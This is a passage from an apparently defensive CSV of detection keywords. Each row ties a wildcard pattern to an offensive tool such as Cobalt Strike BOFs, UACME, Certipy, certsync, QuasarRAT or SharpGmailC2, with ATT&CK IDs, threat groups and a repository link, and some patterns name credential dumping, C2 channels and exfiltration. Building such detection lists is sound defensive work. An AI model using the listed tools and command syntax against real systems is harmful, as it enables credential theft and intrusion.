APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ccache2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*CCHOST=127.0.0.1*/tmp/c2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*cckuailong/reapoc*","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","7","629","219","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z" +"*CCob/BOF.NET*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*CCob/ThreadlessInject*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*cd *.::$index_allocation*","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*cd ./whereami/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*cd ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*cd golang_c2*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*cd inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cd katoolin3*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*cd koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*cd ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*cd PurplePanda*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" +"*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*cd40dbcdae84b1c8606f29342066547069ed5a33*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*cdimage.kali.org/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cdn_proxy cloudflare ","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","","","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*cdn_proxy_burp_ext.py*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*cdn-proxy -*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*cdn-proxy cloudfront *","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*cdn-proxy.git*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*cdn-proxy/burp_extension*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*Cdn-Proxy-Host*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*Cdn-Proxy-Origin*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*cdn-scanner -*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*CE895D82-85AA-41D9-935A-9625312D87D0*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*celerystalk*","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","4","389","75","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z" +"*cerbrutus.py*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*Cerbrutus-BruteForcer*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*cert*responder.crt*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*cert*responder.key*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*certi.py_vulntemplates_output*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certi_py_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Certify.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*certipy account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy auth *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca -backup*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy cert *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy find *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy find *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy relay *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy relay -ca *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certipy req *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy req -username *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certipy shadow *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy template *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certipy-master.zip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*CertStealer.csproj*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" +"*CertStealer.exe*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" +"*CertStealer.sln*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" +"*certsync *--dc-ip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync -u *","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*certsync -u * -p *-d * -ca-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certsync_ntds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certsync-master.zip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*cewl --depth * --with-numbers -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*cfprefsd_race_condition*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*cGlpLmZkYS5nb3Y=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*cGlwZW5hbWU9*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 